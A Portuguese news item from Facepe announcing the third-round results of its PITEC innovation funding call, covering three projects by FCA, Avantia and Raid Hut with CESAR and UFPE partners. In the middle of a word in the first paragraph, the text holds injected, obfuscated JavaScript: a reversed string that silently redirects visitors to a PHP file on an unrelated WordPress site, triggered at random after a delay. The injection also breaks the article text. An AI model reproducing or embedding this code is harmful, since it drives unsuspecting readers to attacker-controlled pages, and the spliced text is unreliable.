Divulgação do resultado da 3ª rodada do PITEC

A Fundação de Amparo à Ciência e Tecnologia de Pernambuco (Facepe) divulga o resultado final da 3ª rodada do Edital 21/2014 – PITEC – Programa de Apoio a Parcerias para Inovação Tecnológica e Formação Qualificada, com a aprovação de três propostas, totaliz$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando aproximadamente R$ 1,5 milhão. As empresas Fiat Chrysler Automobiles (FCA), a Avantia Tecnologia e Engenharia S/A e a Raid HUT Licenciamento de Jogos Digitais LTDA foram contempladas e irão desenvolver os projetos em até 24 meses.

A Fiat Chrysler Automobiles (FCA) e o Centro de Estudos e Sistemas Avançados do Recife (CESAR) desenvolverão um programa específico de formação de recurso humano altamente qualificado, com a temática “Cooperação para Capacitação Tecnológica das Instituições Científicas e Tecnológicas de Pernambuco em Engenharia Automotiva”. O projeto tem o intuito de melhor qualificar a comunidade, por meio de uma parceria com a Ohio State University (OSU), para capacitação de alunos, professores e profissionais a partir da transferência de conhecimento em diversos temas relativos à engenharia powertrain.

Já a Avantia Tecnologia e Engenharia S/A, também em conjunto com o CESAR, possuem um projeto de pesquisa intitulado “Desenvolvimento de uma Meta-Plataforma de Código Aberto (KNOT) para Internet das Coisas” (Internet of Things – IoT), que pretende desenvolver uma plataforma de Network of Things (KNoT) para promover a comunicação entre dispositivos e aplicações, bem como conectar padrões de comunicação, protocolos, bibliotecas e hardwares de referência.

Por fim, a Raid Hut e a Universidade Federal de Pernambuco (UFPE), trazem o projeto de pesquisa “SMART MMO”, que são jogos massivos multijogadores online. O foco da parceria consiste na operação de um jogo deste modelo para antecipar os comportamentos dos jogadores e detectar problemas de forma automática por meio da adaptação de técnicas como análise de sentimentos e analítica preditiva.

O PITEC é um programa da FACEPE para projetos que tenham como objeto a execução de atividades de pesquisa, desenvolvimento e inovação e/ou de programas de formação de recursos humanos altamente qualificados, realizados em parceria entre empresas e instituições científicas e tecnológicas (ICT) ou de ensino superior (IES), situadas em Pernambuco. A submissão de propostas para a 4ª rodada do edital 21/2014 – PITEC, encontra-se aberta e estará disponível até o dia 05 de setembro de 2016.

Para conferir o resultado, clique aqui.